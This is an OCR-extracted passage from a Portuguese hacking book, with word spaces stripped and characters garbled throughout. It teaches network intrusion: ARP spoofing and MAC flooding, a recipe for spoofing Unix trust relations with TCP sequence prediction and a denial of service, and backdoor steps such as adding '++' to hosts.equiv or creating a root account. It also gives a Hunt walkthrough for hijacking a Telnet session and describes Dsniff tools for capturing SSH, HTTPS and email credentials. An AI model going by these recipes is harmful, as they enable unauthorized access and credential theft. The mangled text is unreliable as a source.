maisaexplorarsobreoprograma,masdeixoissocomodeverdecasa.Brinque
comoHuntporalgunsdias,farejesuarede,leiatodaadocumentaçãoeprocu-
repormaisrecursosnaInternet.Depois,tentetambémbrincarcomoSnort,o
Sniffit,oEtherealeoIPTraf,tantoemUnixcomoemWindows.Usetambém
algumasdasferramentassimplesdisponíveisnosCDs.Pararumasemanaou
duasparatalseriaodesejável,esódepoisdissoprossigaaleitura.Valeráa
pena-eserádivertido!
Quandoacaçaévã
oHuntéumótimo(edidático...)sniffer,mastemumproblemainsolúvel
paraosmodelosclássicosdesniffers:nãoustrapassasniffersouswitches.Para
asredescomutadas,énecessárioutilizarsniffersapropriados,quefaçamARP
Spoofmgou,pelomenos,MACFlood.
Doissniffersofazemdeformamagistral:EttercapeDsniff.Jáfalamossobre
ARPSpoofmgeMACFloodháalgumaspáginas.Estudeadocumentaçãoeex-
perimenteambososprogramas.Adicionalmente,sugerin}osqueoleitorprocu-
remaisinformaçõessobreosseguintesmétodosdesniffmg:
~SSLSpoofmg(falseandooumanipulandocertificadosdigitais);
~DNSSpoofing(desviandootráfegoWebparaservidoresfalsos);
~Snarfmg(umamaneirade"pentear"ospacotesTCP/UDPparaextrairde-
lesapenasainformaçãoqueémostradanateladavítima:e-mail,mensagens
instantâneas,páginasdaweb...).
1285I
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
Whocanyoutrust?
Justsayenoughisenough/OhIgotcha/W'howhowhocanyoutrust7
UrnamaneiradeseconseguirumSpoofingmaisefetivoéatravésdas
relaçõesdeconfiança(outrustrelations)entrecomputadores.Issopermite
queumcomputadorpossateracessoaváriosrecursosfazendologinem
apenasumsistema.
Observe:existeumamáquinaservidora(vamoschamá-Iade"S")quepossui
relaçãodeconfiançacomoutrasmáquinas(vamoschamá-Ias"TI","T2","T3"
etc.).Seousuáriologar-senamáquinaS,automaticamenteteráacessoarecur-
sosdasmáquinas"T".Enquantoessafacilidade"quebraumgalhão"paraadmi-
nistradoresderedeepermitequeusuáriosloguem-seemapenasumsistema
parateracessoavários,seumhackerconseguirfazer-sepassarpelamáquina
quetemaconfiançapoderáteracessoatodasasoutras,que"confiam"nela.
TantosistemasUnixquantoWindows(etambémNovell...)possuemfacilida-
.desparecidas.OWindows2000possuiumrecursochamadoAdvanced
DirectoryService(ouADS),quedetémocadastrodetodososusuáriosemá-
quinasdaredeeasrelaçõesentreeles.Ousuário,aologar-seemumdomínio
Windows,temseunomeesenhacomparadoscomosdoADSe,casoaceitos,
todososserviçossãodisponibilizados.
ANovellpossuiumprodutochamadoeDirectory(www.novell.com/pt-br/
products/edirectory)baseadoemumnúcleo,oNovellDirectoryServiceou
NDS.OsoftwareoperadamesmaformaqueoADSdaMicrosoft,comum
diferencial:nãoestárestritoaosprodutosNovell.Narealidadeépossível,atra-
vésdoeDirectory,criarconexõesparatodosostiposdeplataformasdesoftware
7.'~penasdigaquejáteveobastante/Hehe,eupegeivocê/Emquem,emquem,emquemvocêpode
confiar?"JoanJett,Whocanyoutrust.Doalbum"CherryBomb,de1995.
12861
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
ehardwareimagináveis,incluindoaíUnices,Windowsemesmosistemasde
grandeporte.
TantooeDirecoryquantooADSbaseiam-senumpadrãochamado
LightwheightDirectory,AccessProtocolouLDAP.HáversõesdoLDAPdispo-
níveisparadiversossaboresdeUnix.UmadasmaisfamosaséoOpenLDAP
(www.openldap.org).versãolivre,gratuitaedecódigoaberto.OLDAPéuma
formaseguradeprover,paraaplicaçõesUnix(etambémWindowse
Macintosh...),ochamadosing1e-sign-on(oulog-seapenasumavez)eteracesso
aváriosrecursosdisponíveisempontosdistantesdarede.
MasossistemasUnixpossuemdoisantepassadosdessesserviços:oNIS
(NetworkInformationService)eofamigeradoUnixTrust.Porsuaidade,am-
bossãoextremamenteinsegurosefacilmentehackeáveis.FalaremosdoNIS
maisparafrente,jáquesuafalhanãosetratadeIPSpoofmg.
OUnixpossuiumasériedecomandos,todosiniciandoem"r"(deremote)que
permitemquediversossistemaspossamseroperadossemquesejaprecisoau-
tenticar-seemcadaumdeles.Imagine,porexemplo,queousuárioestálogado
namáquinaA.AmáquinaBconfiaemA,portantopermitiráqueoscomandos"r"
sejamexecutadosnelatambém.Porexemplo,seousuáriodamáquinaAemitiro
comandorloginIP.DE.B,serápresenteadocomumshelldamáquinaBsemque
sejanecessáriofornecerusuárioousenha.BconfiaemA,entãoBconfianos
usuáriosdeA...Damesmaforma,háoscomandosrsh(remoteshell-permitea
execuçãodeapenasumcomando),rcp(remotecopy),rmail(lêe-mailsnooutro
sistema)entreoutros.Paraquesejapermitidaaexecuçãodoscomandos,éneces-
sárioqueoIPdeAestejacontidonoarquivo/etc!hosts.equivdeB.Todasas
máquinascujoIPestãoem/etc!hosts.equivdeBsãodeconfiançaparaB.Além
dessearquivo,cadausuáriodeBpodeter,emseupróprio!home,umalistade
máquinasnasquaisconfia,guardadanoarquivo.rhosts.
Confiança
letc/hosts.equiv
-IP.DE.A
-IP.DE.H
Noexemploacima,todasasmáquinas"S"e"T"sãoUnix.Asestaçõespodem
serqualquercoisa.Emcadaumadasmáquinas"T"mostradas,háumarquivo,o
/etc!hosts.equiv,contendooIPde"S".Assim,todososusuáriosqueselogarem
em"S"poderãoteracessoaosrecursosdasmáquinas"T".Épossívelcrialshell
scriptscomosr-comandos,porexemplo,paraautomatizaroprocessoefacili-
taravidadessesusuários.
12871
1Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
Masoqueacontecequandousamososr-comandos?Ousuárioestálogado
em"s"e,pormeiodeumcomandorlogin,conseguiuumshellde"T3"semque
fossemsolicitadosumusuárioeumasenhaválidosem"T3".Ocorreque,na
prática,ousuárioestálogadoem"T3",etodasassuasaçõesserãooriginadas
de"T3"(enãode"s"oude"H",suaestaçãodetrabalho...).Seoinvasorusar
algumscannercontraositedeumaempresa,outentarconectar-seporbrute-
forceaumserviçonaInternet,seráoIPde"T3"queseráregistrado,nãoode
"s"emuitomenosode"H".
Agoraéqueamágicaacontece.Seformosusuáriosjácadastradosem"S",nãohá
problema.Bastalogarmosem"S",darumrloginparaT3eusá-lo.Masesenãofor-
mos?Emesmoseformos,seremosregistradosnoslogsde"S",entãooquefazer?
Épossível"envenenar"umarelaçãodeconfiançaentreduasmáquinasusan-
dospoofmg,umpoucodesniffingeumapitadadenegaçãodeserviço.Imagi-
neumaredecorporativaondeháumamáquinachamadaSERVLOGIN,naqual
osusuáriosserãoautenticados,eoutras,cadaumacomumnomealusivoao
recursoqueeladisponibiliza(porexemplo,IMPRESSORA,FISCAL,INTRANET,
VAX,FINANCEIRO,entreoutros...).Todasessasmáquinasusamojetcj
hosts.equivpara"confiar"nojulgamentodeSERVLOGINnotocanteaquais
usuáriostêmpermissãoparaacessarseusrecursos.Imaginetambémque,em
algumlugarignoradonaInternet,háumamáquina"H"quedesejaconectar-se
aalgumcomputadorinterno.
Pararealizaratarefaacontento,temosquepartirdealgumaspremissas:
~Emprimeirolugar,temosqueteremmenteque"H"nãoestánamesma
LANqueSERVLOGINouqualquerumadasoutrasmáquinas.Pelocontrário,
estálá-beeeemlonge-nanuvemdaInternet.Porissomesmo,éimpossível
"esnifar"oqueocorrenaLAN.
~DealgumamaneirajádescobrimosqueSERVLOGINéconsiderado
"confiável"pelosoutrosservidores.DescobrimosissoporqueinvadimosIM-
PRESSORA,porexemplo,ouopróprioSERVLOGIN,econsultamososarquivos
.rhostsoujetc!hosts.equivoumesmooslogsdosistema,àprocuradesinais
deconexãoporUnixTrust.
12881
Ataque,defesaecontra-ataque:Invasão

Universidade3°ano
~Nossoobjetivoé,então,traçado:queremosqueumadasmáquinas(por
exemplo,INTRANET)"pense"que"H"é,narealidade,SERVLOGIN.Comisso,
teremosumshellemINTRANET,comumIPàdisposiçãoparausarmosàvon-
tadeemnossasmaldadesporaí...
Vamosdaruma"receitinhadebolo"paraesseataque.Éamelhormaneirade
explicarateoriadecadaumdospassosnecessários.Paramaiorclarezano
texto,chamaremoscadaumdoscomputadoresapenasporseusnomes(Le."H"
emvezde"amáquinaH"ou"s"emvezde"oservidorS").
1."H"iniciavárias-naverdade,milharesde-conexõesreais,semimpos-
tura(ouseja,semspoofmg),paraINTRANET."H"enviaváriospacotesSYNe
esperapelosACKsdeINTRANET.BaseadonessesACKs,"H"podeinferir(ou
antes,adivinhar)aprogressãodenúmerosseqüenciaisTCPgeradospor
INTRANET.Comisso,"H"podeterumaidéiadosnúmerosausarmaispata
frente,quandoestiverconectandoaosistemaINTRANET.
2.Depoisdisso(ousimultaneamente,casooinvasorpossuaoutramáqui-
na)lança-seumataquedenegaçãodeserviçocontraSERVLOGIN.Com
SERVLOGINforadajogada,impedimosqueomesmoenvieumpacoteTCP
RSTederrubenossaconexão"spoofada".
3.Usandoumdosr-comandos,"H"iniciaumaconexãoaINTRANETusando
oIPdeSERVLOGIN.AINTRANETrespondecomumACKparaSERVLOGIN,
queestáforadecombatedevidoànegaçãodeserviço.
4.Agora,amágica:"H"enviaumACKparaINfRANET,comoIPdeSERVLOGIN
eumaestimativadonúmeroseqüencialTCP -calculadopelaprogressãodetecta-
danopasso1maisotempoqueoprocessotodolevouatéchegaraqui.
5.Casotenhaacertadonamosca(ohackerpossuiapenasumtiro...)aco-
municaçãoéestabelecidaemantidaenquantoSERVLOGINestiverforadoar.
Setivererrado,oinvasorpoderepetirareceitinhaatéacertar.
AlgunssistemassãoidiotamentefáceisdepreveraseqüênciaTcp,outrosnemtanto,
eháunspoucosondeessaseqüência(?)équasealeatória(?!?!??).Apredictabilidade
deladiráseosistemaéfacilmentehackeávelporessemétodo-ounão.
Lembradaquelasvelhascantigasdotipo"JoãoamavaMariaqueamavaPedro..."?
Poisé.Nopasso3,"H"iniciouumaconexãocomINTRANEffingindoserSERVLOGIN.
Parainiciaressaconexão,usouumr-comando(porexemplo,umrlogin).Seohacker
acertouaseqüenciaTCp,foipresenteadocomumshelldeINTRANET.Sóque
INTRANET"pensa"quequeminiciouacomunicaçãoéSERVLOGIN,emandaas
respostasparaessamáquina.Resultado:"H"podeemitircomandos,masnãotema
mínimaidéiaseestãofimcionandoounão-nãoháfeedbacknatela.
Enquantoissopodeparecersuficienteparaumestragoqualquer(assimcomo
nasvulnerabilidadesdiscutidasanteriormente,comooestourodepilhaouos
CGIs"amigos"),ohackerpodeusaresseshell(etambémodoestourodepilha,
bemcomoodosCGIs...)paraconfigurarrapidamenteumbackdoorem
INTRANET.NãoseesqueçaqueSERVLOGINestátintocomanegaçãodeservi-
ço,masrecobraráossentidosaqualquermomentoecortaráacomunicação
12891
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
(comumTCPRST)entreINTRANETe"H".Entreascoisasqueoinvasorpode
fazernamáquinaINTRANETestão:
~ColocaroIPde"H"no/etc!hosts.equiv;
~Criarumusuáriocomdireitosderootno/etc/passwd;
~Implantarqualquertipodebackdoor.
Hámaisopçõesalémdessas.Apartirdessasalterações,ohackerpodeinsta-
larváriosbackdoors,incluirmaismáquinasnohosts.equiv(oumesmoosímbo-
lo++,quefazcomqueINTRANETconfieemqualquerum...)ecriaroutras
contasnosistema.Éclaroqueadministradoresatentoslogonotarãotaismu-
danças,porissoébomusaressamáquinapararapidamente"Ownar"outras.
Nãoesqueçaaindaque,pormaisengenhosoqueoprocedimentoseja,ferra-
mentasdeIDSeauditoriadearquivoslogodescobrirãoafaçanha.
Comotarefaparacasa,sugerimosaoleitorqueprocuredocumentaçãona
InternetsobreosseguintestiposdeSpoormg:
~DNSSpoofing
~SourceRouting
~ProxySpoofing
~Daisy-chainSpoormg
Capturadesessões(Hijacking)
Lembro-medasaulasdematemáticadaprimeirasériedoprimário(hojeisso
échamadodeEducaçãoFundamental,masétudoamesmacoisa...).Problemas
matemáticoseramresolvidosdividindoafolhadocadernoemtrêscampos:
sentençamatemática,cálculoeresposta.Nasentençamatemática,colocáva-
mosoquefui,anosdepois,aprenderquesechamaformaalgébricadaequação
(oudainequaçãooufórmula).Asentençamatemáticadeveriaseralgoclaroe
bemdetalhado,paraqueapessoaquefosseleraresoluçãodoproblemapu-
desseentendê-lonumrelance.NocampoCálculos,ascoisaserammaislivres.
Podíamospreenchercompletamenteoespaçocomcálculoseanotações
-
mantendo,obviamente,alguma"limpeza",senãoeranotazero!Naresposta,
noserapermitidocolocarapenasoresultadodenossoscálculos.Emnossos
estudossobreinvasões,podemoscolocar,emnossasentençamatemática,o
seguinteproblema:Sniffmg+Spoormg
=?Façamososcálculos,então,eveja-
mosnoqualissovaidar.
Naspáginasanterioresvimosquesniffmgéummeiodesaberoquesepassa
numaredelocal-mesmoqueosdadosemtrânsitonãosejamdenossaconta.
Poroutrolado,podemosenviardadosaoutroscomputadoresfingindoser
umaterceirapessoa-issoéspoormg.Éfácilperceberque,combinandoessas
duastécnicas,podemos"roubar"umasessãoentredoiscomputadores."Como
assimroubar?",oleitorperguntaria.Umaimagemvalepormilpalavras:
1290
I
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
ObservequeA,BeHnãoprecisamestarnamesmaLAN.Hpodeestar,com
efeito,naLANdeA,nadeBouemqualquersubredeintermediária.Amalhade
roteadoresmostradapoderiasersubstituídaporuma"nuvem"representandoa
redecomoumtodo-poderiamesmoseraInternet.OimportanteénotarqueH
temdeestaremalgumpontopeloqualestejampassandoospacotesentreAeB.
AconexãoentreAeBpoderiaserqualquercoisa,comoumachamadaHTfPou
correioeletrônicosendotransmitidoviaSMTP.Capturandoumasessãodecon-
versaçãoporICQ,porexemplo,podemoscontinuarconversandocomBen-
quantoelepensaquesomosA.CapturandoumasessãodeFTp,5MB(redes
Microsoft)ouTelnetentreousuárioAeoservidorB,porexemplo,podemos
navegarpelosservidoressemprecisarfazerlogin
-Ajáofezanteriormente,eB
agorapensaquesomosA.Acendeuuma"luzinha"aí?Poisé,háoutrasmaneiras
deconseguiracessoasistemasalémdobroteforceebufferoverflow...
Realmente,pormaisqueosmecanismosdeautenticaçãosejamseguros(senhasde
mãoúnica,criptografia,assinaturasdigitais,etc.),pode-secapturarumacomunica-
çãoqualquerDEPOISqueaautenticaçãofoifeitae,assim,pularessapartechata.As
produtorasdesoftwarenormalmentegastammilhõesemdesenvolvimentodees-
quemassegurosdeautenticaçãoeesquecem-sedoque,umavezfeita,osistemairá
SEMPREacreditarqueousuárioéomesmo
-e,comovimos,nemsempreé...
Outracaracterísticadeumasessãodehijackingéquenãoéprecisoestimarou
adivinharaprogressãoeapreditabilidadedosnúmerosseqüenciaisTCP.Oata-
cante,estandonomeiodocaminhoentreasduasestações,temacessoàprogres-
sãorealdosnúmerosseqüenciaisTCPepode,portanto,controlá-Iosquandoesti-
verfazendosepassarporoutrem.Emnossoexemplo,Hestácuidadosamente
registrandotodaacomunicaçãoentreAeB,incluindoaíasseqüênciasTCP.
Naprática,ospassosaseremseguidossão:
1.Hdeveobservar-comtécnicasdesniffmg -acomunicaçãoentreAeB
porumtemporazoável,paradeterminarotipodeconexão,oprotocoloem
uso(HTTP,SSH,FTp'Telnet,MSN,ICQ...)easeqüênciaTCPnosdoissentidos.
Tudoissodeveserregistradoemumarquivoeanalisado.Quandoaconexão
estiverbem"escarafunchada",decide-sequeéinteressanteseqüestrá-Iaedeter-
mina-seosmeiosparatal,aípodemosiniciaracaptura.
2.Hcomeçaentão-comtécnicasdespoofmg-a"enganar"B,fazendo-o
pensarqueHéA.AformamaisusualéHsimplesmentecriartráfegoentreele
1291I
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3RI
eB,gerandopacotescujoendereçoIPdeorigemsejaodeA.Bpensaráqueos
pacotesvêmdeA.
3.UmavezqueBaceitacomandosdeHpensandoseremdeA,pode-se
controlarBapartirdeH.SeforumasessãodeTelnetoudeSSH,Hpodeoperar
ocomputadorBporcomandosshell.SeforumasessãoFTp'Hpodebaixar
arquivosdeBqueestejamliberadosparaA-ebloqueadosparausuáriosde
FTPanônimo.SeforumaconversaçãoMSN,Hpodecontinuaraconversacom
BfmgindoserA.
Olhando"porcima",parecequefunciona.Masháumproblema:Aaindaestá
vivaeBdevolveaelapacotesTCPcomobitACKligadocadavezqueHinjeta
tráfegonalinha.AtentaráressincronizaraconexãoeresponderáaBnames-
mamedida.AlémdessesACKsespúriosgeradospelospacotesinjetadosporH
naconexão,háaindaospacotesnormaisdaconexãoentreAeB.Issocausará
oquechamamosdetempestadeACKouACKstorm.
Quandodescreve-
mos,páginasatrás,um
spoofingbaseadoem
UnixTrusts,retiramos
doaramáquina
SERVLOGIN(aquela
pelaqualqueríamos
nosfazerpassar)por
meiodeumataquedo
tipoNegaçãodeServi-
ço.Naquelaocasião,o
fizemosparaevitarqueSERVLOGINderrubasseaconexão(queafmalnãofora
geradaporela)comumpacoteTCPRST.Ocasoaquiéligeiramentediferente:
ArealmenteiniciouaconexãoentreelaeB.OtráfegoinjetadoporHaprovei-
ta-sedissoeatempestadedeACKséumefeitocolateralindesejado,emvezde
serumprocedimentonormaldoprotocoloTCp'comonocasodoRST.
Apesardeserefetivonaquelecasoespecífico-nãoprecisávamosdeSERVLOGIN
nodecorrerdaação-,usarDenialofServicenemsempreédesejável:
~Amáquinaforadoarpodevoltaraqualquermomento.Nãoháprevisãode
quando,ecertamenteotempoqueficarádesabilitadaserámuitopequeno -o
suficienteparaumoudoiscomandos.
~SeocomputadorquesofreuoDoSforatendidoporalguém,ouseja,hou-
verusuáriosconectadosnele-porexemplo,umaestaçãodetrabalho-,o
ataqueseráfacilmentedetectado.
~Emalgunscasos,énecessárioqueocomputadorpeloqualqueremosnos
fazerpassarfique"vivo" -hárecursosquesópodemserdestravadosporele,
ouprecisamosqueousuárioacreditequeaindaestáconectado.
~EraimperativotiraramáquinadoardevidoaosTCPRST,quecancelama
2921
Ataque.defesaecontra-ataque:InvasãoI

Universidade3°ano
conexãocorrespondente.AquinãoháRSTpoisooriginadordaconexãofoi
-
realmente-AenãoH.Apassaasernecessárioenãoindesejado.
~NegaçãodeServiçoéalgodeselegante-evocêévaidoso,nãoé?
Arespostaestáemalgumaspáginasumpoucomaisparatrás.Quandofize-
mossniffmgativo,usamosatécnicadeARPSpoofmgparaconfundiroswitch
easprópriasestações,colocandonossamáquinanomeiodaconexão.Paratal,
usamosoprogramaHuntemumaconfiguraçãoman-in-the-middle.Bem,pode-
mosusaramesmaidéiaparaevitaroACKStorm.Comotráfegopassandotodo
pelamáquinaqueestáescutandoarede,podemoscontrolarapropagação
dessesACKsespúrios.
Nessaconfiguração,ficaclaroque,comonãoháproblemadetempestadede
ACKs,podemosemitircomandosparaamáquinadestino(B,emnossoexem-
plo).Obviamente,quandoaconexãoentreHeBforencerrada,adiferença
entreosTCPsequencenumbersqueAenviaequeBesperaétãograndequea
sincronizaçãoentreAeBéimpossível-eaconexãoentreelestambémcai.
ProgramasdeHijackmodernos(comooHunteoDsniff)possuem,entretanto,
ferramentaspararessincronizarasconexões,assimumadesconexãogratuita
nãoirácausardesconfianças.
Selecionandoseuscombatentes
Éclaroqueháapossibilidadedesefazertudoissomanualmente.Entretanto,
amaneiramaisfáciléusarferramentasespecialmenteconstruídasparatal.
UmadelaséoHunt,vistonasessãosobresniffmg.OHuntpossuiduasopções
interessantes:simplehijackearp/simplehijack.Nomenuopções,eleoferece
algumaspossibilidadestambémmuitointeressantes,comoarpspoofwithmy
mac(lembram-sedoARPSpoofmg?),learnMACfromIPtrafficeswitched
environment(ferramentasparaenganarbridgeseswitches).
ODsniff,outrasuítedesniffingcomentadaanteriormente,tambémpossui
ferramentasparacapturadesessões.AlémdopróprioprogramaDsniff(es-
pecializadoemsniffing),asuítepossuiasseguintesferramentas:
FerramentasdesniffingincluídasnasuíteDsniff:
~fllesnarf:copianamáquinadohackerosarquivostrafegandoemuma
conexãoNFS(NetworkFileSystem)entredoisoutroscomputadores.
~mailsnarf:reproduznamáquinainvasoramensagensdee-mailsendotrans-
mitidasporPOPouSMTP.Commodificaçõesnocódigodoprograma,épos-
sívellertambémmensagensIMAPeUUCP.Asmensagenssãoarmazenadas
emformatomailbox-legívelporpraticamentetodososprogramasdee-
mailexistentes.
~msgsnarf:registratodaaconversaçãoentreduaspessoasqueestejam
usandoosserviçosdemensageminstantâneaAOLInstantMessenger,ICQ
2000,IRC,MSNeYahoo.
1293I
]Ataque.defesaecontra-ataque:Invasão

IUniversidadeH4CK3RI
~urlsnarf:farejarequisiçõesHTTPeasapresentanoformatoCommon
LogFormatouCLE
FerramentasdespoofingincluídasnasuíteDsniff:
~arpspoof:ferramentaparaARPSpoofing.
~dnsspoof:forjarespostasasolicitaçõesDNSemumaLAN.Éútilpara
contornarregrasdeacessobaseadasnonomedohostouparaimplementar
diversosataquestipoman-in-the-middlebaseadosemDNS.
~macof:umaferramentaparaMACFlooding.InundaaLANcomumamul-
tidãodeendereçosMACrandômicos,fazendocomquebridgeseswitches
vulneráveispassemasecomportarcomohubs-ouseja,deixandopassar
todootráfegoindiscriminadamenteportodasasportas.
Ferramentasdecapturaecontrole(hijacking)incluídasnasuíteDsniff:
~tcpkill:derrubaaconexãoselecionada.
~tcpnice:controlaavelocidadedaconexãoentredoisnóssemprejudicar
orestantedarede.Éinteressanteparareduziravelocidadedeumaconexão
e,comisso,monitorá-Ia"aovivo".
~sshmitm:agecomoumintermediário(umaespéciedeproxy)paracone-
xõesSSH.Umavezdesviadaaconexão(comferramentascomo,porexemplo,
odnsspoof),osshmitmpodefarejarotráfegoàprocuradeloginsesenhase
mesmocapturarasessão.Aporçãomitmdonomesignificaman-in-the-middle.
~webmitm:agetambémcomointermediário,destavezparaconexões
HTTP/HTTPS(sim,suportaSSL!!!).Útilparaconseguirsenhasdeacessoa
siteseinformaçõesnormalmenteinseridasemformulárioscomonúmeros
decartõesdecréditoeinformações"criptografadas".
AlémdoHuntedoDsniff,háalgumasoutrasferramentasparaseqüestro
desessões.Umadelas,muitoconhecida,éoJuggenaut(packetstorm.
linuxsecurity.com/new-exploits/1.2.tar.gz).Outrotambémmuitocomenta-
doéoIP-Watcher,produtocomercial(epago)daEngardeSystems -
www.engarde.com).Umdetalhe:todoselessãoparaUnix.Nãoháboasop-
çõesdeferramentasparaseqüestrodesessõesquerodememWindowsou
outrasplataformas-nestecasoespecífico,meuamigo,vocêestápresoaos
Unix.UmasaídaédotarseuWindowsdeumambienteUnixsimuladocomoo
Cygwin(www.cygwin.com)erodaressasferramentaslá.Paraisso,serápre-
cisoinstalartambémasbibliotecaspertinentesacadaumdossoftwaresden-
trodoCygwin.OutramaneiraédotarseuWindowsdeumamáquinavirtual
PCcompleta,comoocomercialecaroVMWare(www.vmware.com)ouo
livreegratuitoBochs(bochs.sourceforge.net),erodaralgumUnixparaPC
(Linux,FreeBSD,Solaris)dentrodele.
12941
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
Seqüestronaprática
(ou:comometorneimembrodoALQaedaJ
AnteriormentedescrevemosumasessãodesniffmgcomoHunt.Chegamos
aopontodeverificaroscomandosqueAemitiaparaBeverasrespostasque
BenviavaparaA.Aindanãoestávamosexatamentenomeiodaconversação-
simplesmentefarejávamosotráfego("pô,passamporaquiberrandoenão
queremqueeuescute...").
Vamosrefazê-Ia,destavezcapturandoasessão.Usaremosnossarededetes-
teseasmesmasinstalaçõesqueusamosemnossoexperimentoanterior.Usare-
mostambémamesmasessãodeTelnetquedescrevemos.
Rapidamenterelembrandooprocedimentojávisto,selecioneaopção"o"
(options)eadicioneumaconnpolicy,deacordocomosIPsdasmáquinascujas
conexõesqueremosmonitorare,posteriormente,capturar.Digite"1"paraver
seháinterfaces"vivas"queobedeçamaessaregra(observeopromptdoHunt).
Depoisdisso,digite"x"paravoltaràtelaprincipale"1"novamenteparalistar
asconexõesexistentesqueestejamdeacordocomasconnpoliciesdefmidas.
Selecione"w"(watch)paramonitorarumadasconexões,edepoisescolhaa
conexãodenossasessãotelnet(lembre-se:estamosfazendoumtelnetdamá-
quinaWindowsparaaCoitada).Logue-seporTelneteemitaalgunscomandos.
Setudoestivercerto,todososdadosemambosossentidosdaconexãoserão
ecoadosnoHunt-queestárodandonaestaçãoUnix.Atéaquieraoquehaví-
amosfeito.
Noteque,sevocêestiveremumambientederedesegmentado(porexemplo,
háumswitchemsuaLAN),vocêterádefazerumARPSpoofmgparaenganá-Io
-casocontrário,nãoconseguiráverasconexõesqueestejamemoutroseg-
mento.OpróprioHuntpodefazerisso.Selecione"d"(daemons)e"a"(arpspoof
+arprelayerdaemon),econfigureosendereçosIPdeorigemedestinopelos
quaisvocêquerfazerARPSpoofmg(opção"a"
-addhosttohostarpspoot).
Digite"s"parainiciarodaemoneesperealgunsminutos.Dependendodotrá-
fegodesuaredeedasestaçõesemquestão,podedemorardeuma20minutos
paraqueoswitchpasseadistribuirpacotesindiscriminadamente.
Comousemswitch,vocêestáprontoparaseuprimeiroseqüestro.Volteao
menuprincipaleescolhaaopção"a"(arp/simplehijack).Seráperguntado
qualdasconexõesdesejacapturar.Selecioneaconexãodenossotelneteres-
pondaàsperguntassobreconexãoeapresentaçãodosdados.Ateladecaptura
é,emumprimeiromomento,idênticaàteladeobservação(watch).Ocompor-
tamentotambéméomesmo,porenquanto:tudooqueousuáriodamáquina
WindowsfizerseráecoadoparaoHuntantesdeserenviadoà"Coitada",o
mesmoocorrendocomarespostade"Coitada"paraWindows.
Issoocorreráindefrnidamente,atéqueoHackerdesejecapturaraconexão.
Paratal,bastapressionarControI+C.Natela,apareceráamensagem:
-pressanykey>
1295
I
IAtaque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
Assimquewnateclaqualquerforpressionada,ateladoHuntseparecerácom
isso:
-pressanykey>
youtookovertheconnection
CTRL-]tobreak
Pronto!Jáestamosemmodointerativocomasessãocapturada.Amáquina
Windowsnãotemmaiscontrolesobreaconexão,tudooqueousuáriodigitar
seráecoadonoHuntnacorverde,masnãoseráenviadoàCoitada.Poroutro
lado,tudooqueoHackerdigitarnoHuntseráenviadoàmáquinaCoitada.
ComoéumasessãodeTelnet,digitarcomandosdeshellnoHuntresultaráem
suaexecuçãoemCoitada.
-pressanykey>
youtookoverthe
CTRL-]tobreak
ls
ls
ls
exit
cazzo!
connection
Comandosdigitadospelo
usuárioqueperdeuaconexão
coitada[/home/usuario]
>ls
Desktop README Xresources Xsetup aliases.sh chooserjtmp
coitada[/home/usuario]
>W
1:44amup7days,5:44,
USER TTY FROM
root ttyl
usuariopts/2
root pts/O
root pts/l
coitada[/home/usuario] >
192.168.1.1
4users,loadaverage:0.99,1.22,1.20
LOGIN@ IDLE JCPU PCPUWHAT
Wed3pm3:48m0.07s0.07s-bash
1:07am O.OOs0.03sO.Olsw
29May037daysO.OOs ?
Wed3pm9:28m0.15s0.15s/bin/bash
NateladamáquinaWindowsserámostradaaseguinteinformação:
$ls
$ls
$ls
$exit
$cazzo!
Ouseja,ousuáriotemwnarealimentaçãodoquedigitou,enenhumamensa-
gemdefalhaserámostrada-simplesmentenãoacontecenada!Essasaídaé,na
verdade,fomecidapeloHunt.Eleincluiocaráter$paradarumaimpressãode
promptdoshell-lieanddeceive...
2961
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
Comcontrolesobre"Coitada",ohackerpodetentaroquequiser:colocarum
backdoor,apagartudo,fazerdownloaddedocumentosearquivosimportantes
(inclusiveoarquivodesenhas),usaramáquinacomotrampolimparaoutroata-
que(maisumamaneiradespoofing...),tentarganharacessoirrestrito,etc,etc,etc.
ÉmuitoimportanteobservarqueusamosumservidorUnuxcomoexemplo,maso
procedimentoéomesmoparaqualquerplataforma.Poderíamostranqüilamente
terusadooHuntparaseqüestrarumasessãoentreumaestaçãoWmdows98eum
servidorWmdows2000comnseTelnethabilitado(ouFIPouHTTPouPOP...).
Quandocansardebrincar,oinvasorpressionaControl+]parasair.Eleterá,ainda,
aopçãodederrubaraconexão(eousuárionamáquinaWmdowsreceberáuma
falsamensagemdeproblemascomarede)ouressincronizá-la.OHuntéinteligente
nessahora:eletemregistradososnúmerosTCPseqüenciaisvindosdamáquina
WindowsedaprópriamáquinaUnix,naqualestáoprograma.Dessaforma,oHunt
sabequantospacotesWmdowstemdeenviarparao"limbo"antesdepermitirsua
reconexãoàmáquinaCoitada.Porexemplo,seoHuntenviou45pacotesTCPpara
aCoitada,quandoacapturadasessãoforfinalizadaamensagem
msgfromroot:powerfailure-trytotype45characters
serámostradanateladeWindows.Assimqueousuáriodigitara45atecla,os
númerosseqüenciaisTCPestarãonovamenteemsincronia.Asessãopodecon-
tinuarnormalmente-e,namaioriadoscasos,ousuárioemquestãosequer
perceberáoqueaconteceu.Mastenhaemmentequeamaioriadasvezesnão
significatodas,eumusuárioqueconheçaocomportamentodoHuntfacilmen-
teidentificaráafalcatruaeavisaráaautoridadecompetente.
Tarefapara.casa:tentefazerexatamenteomesmocomoDsniff(leiaadocu-
mentação!).Vocêveráque,pornãoserumaferramentaintegradacomoo
Hunt,masumconjuntodepequenasferramentasdeusoespecífico,teráde
usarváriasdelasparaobteromesmoefeito.Entretanto,nomaisperfeitoestilo
Unixdefazerascoisas,tambémveráqueébemmaisfácilautomatizaroata-
quecomumshellscriptquefaçausodelas.
Outrosmétodosdedesviartráfego
Hámuitasoutrasformasdecolocar-senaposiçãodeman-in-the-middleefazer
otráfegopassarporseucomputadorantesdechegaraodestino.Algumasdelas
incluemdesviartráfegowebpormeiodeDNSSpoofmg.Háferramentas(como
odnsspoof,inclusonasuíteDsnift)quepodemserprogramadasparaenviar
falsasrespostasarequisiçõesDNS.Porexemplo,ositedaDigeratiestáhospeda-
donohost200.246.179.102.Épossívelusarodnsspoofparafazerumintemauta
qualqueracreditarque,emvezdisso,odomíniodigerati.com.brestáem
